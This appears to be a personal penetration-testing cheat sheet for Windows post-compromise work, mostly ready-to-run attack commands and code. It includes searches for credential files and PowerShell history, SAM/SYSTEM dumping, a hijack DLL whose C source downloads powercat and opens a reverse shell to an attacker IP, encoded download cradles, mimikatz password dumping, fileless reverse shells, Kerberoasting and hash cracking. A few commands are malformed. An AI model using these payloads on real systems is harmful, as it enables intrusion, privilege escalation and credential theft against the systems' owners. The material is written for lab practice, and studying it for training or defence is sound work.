Post Compromise

There are several key pieces of information we should always obtain:

- Username and hostname
- Group memberships of the current user
- Existing users and groups
- Operating system, version and architecture
- Network information
- Installed applications
- Running processes

Display network and process info

route print
netstat -ano
powershell -command "Get-Process"
tasklist

Check installed applications

# 32 Bits
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

# 64 Bits
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Display Application Details

powershell.exe -command "Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*""

Searching stuff

#Search for .kdbx files
powershell -command "Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue"

#Search for txt , ini files
powershell -command "Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.log -File -Recurse -ErrorAction SilentlyContinue"


#Search for .txt, .pdf, .xls, .xlsx, .doc, .docx 
powershell -command 'Get-ChildItem -Path C:\Users\dave\ -Include powershell -command "*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue"'

Checking History

Get-History

type (Get-PSReadlineOption).HistorySavePath

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

cat (Get-PSReadlineOption).HistorySavePath

cat (Get-PSReadlineOption).HistorySavePath | sls passw

Get DPAPI Master Key

Get-ChildItem C:\Users\dave\AppData\Roaming\Microsoft\Protect\

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d---s-          4/1/2024   7:55 AM                S-1-5-21-2309961351-4093026482-2223492918-1002             


Get-ChildItem -Hidden  C:\Users\dave\AppData\Roaming\Microsoft\Protect\S-1-5-21-2309961351-4093026482-2223492918-1002


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-hs-         11/8/2022   7:36 AM            468 1a65c284-d429-4e6b-b7ab-5fc1a2d95636                                 
-a-hs-          4/1/2024   7:55 AM            468 3ff87438-3511-45ac-91ff-611a4521838f                                 
-a-hs-         2/10/2023   5:28 AM            468 7ba528f7-4e73-48a3-8a67-e5680688c9ff                                 
-a-hs-         6/15/2022   7:48 PM            468 d713cea3-8216-4125-b4eb-26f1b4b313e7                                 
-a-hs-          4/1/2024   7:55 AM             24 Preferred

Dumping SYSTEM and LOCAL

impacket-secretsdump LOCAL -sam SAM -system SYSTEM

DLL Injection (if we have System32 folder write access but cannot get shell)

tzres.dll

Generate a custom DLL and locate it at C:\Windows\System32\tzres.dll

# run if cannot compile 
sudo apt-get install mingw-w64

x86_64-w64-mingw32-gcc rev.cpp --shared -o tzres.dll

rev.cpp

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        system ("powershell -w hidden -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

1.1 Additional (encoding the reverse shell)

echo "IEX (New-Object Net.webclient).downloadString('http://192.168.45.211.ps.ps1')" | iconv -t utf-16le | base64 -w 0; echo

powershell -ep bypass -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAxADoAOAAwAC8AcABzAC4AcABzADEAJwApAAoA

Open listener

sudo rlwrap nc -nlvp 17788

Attain a system shell access.

Printconfig.dll

Generate a custom DLL and locate it at C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.
Initiate the PrintNotify object by executing the following PowerShell commands:

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

Attain a system shell access.

wpcoreutil.dll

phoneinfo.dll

dxgi.dll

wlbsctrl.dll

wbecomn.dll

ualapi.dll

Mimikatz

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/mimikatz.exe'); 
.\m.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" > mout.txt

Fileless Reverse Shell

powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell

Double reverse shell (runas also have exe)

iex(new-object net.webclient).downloadString('http://192.168.45.160/Invoke-RunasCs.ps1'); import-module ./Invoke-RunasCs.ps1;Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.160/powercat.ps1'); powercat -c 192.168.45.160 -p 17676 -e powershell" 

#Make sure 
python3 -m http.server 80

192.168.249.187 - - [11/May/2024 15:14:01] "GET /Invoke-RunasCs.ps1 HTTP/1.1" 200 -
192.168.249.187 - - [11/May/2024 15:14:01] "GET /powercat.ps1 HTTP/1.1" 200 -

Local GetSPN.ps1

powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.211/Get-SPN.ps1','C:\Users\Public\Get-SPN.ps1'); ./Get-SPN.ps1

#Request user svc_mssql ticket
Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'

wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1

#Steal the ticket 
iex(new-object net.webclient).downloadString('http://192.168.49.211:80/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat Hashcat

Copy and paste the hash , remember replace "space" and all "\n" with "empty"

hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt

Cracking the hash with hashcat

PreviousTHM Priv Esc NextPort Forwarding

Last updated 1 year ago

hashtagDisplay network and process info

hashtagCheck installed applications

hashtagDisplay Application Details

hashtagSearching stuff

hashtagChecking History

hashtagGet DPAPI Master Key

hashtagDumping SYSTEM and LOCAL

hashtagDLL Injection (if we have System32 folder write access but cannot get shell)

hashtagtzres.dll

hashtagPrintconfig.dll

hashtagMimikatz

hashtagFileless Reverse Shell

hashtagDouble reverse shell (runas also have exe)

hashtagLocal GetSPN.ps1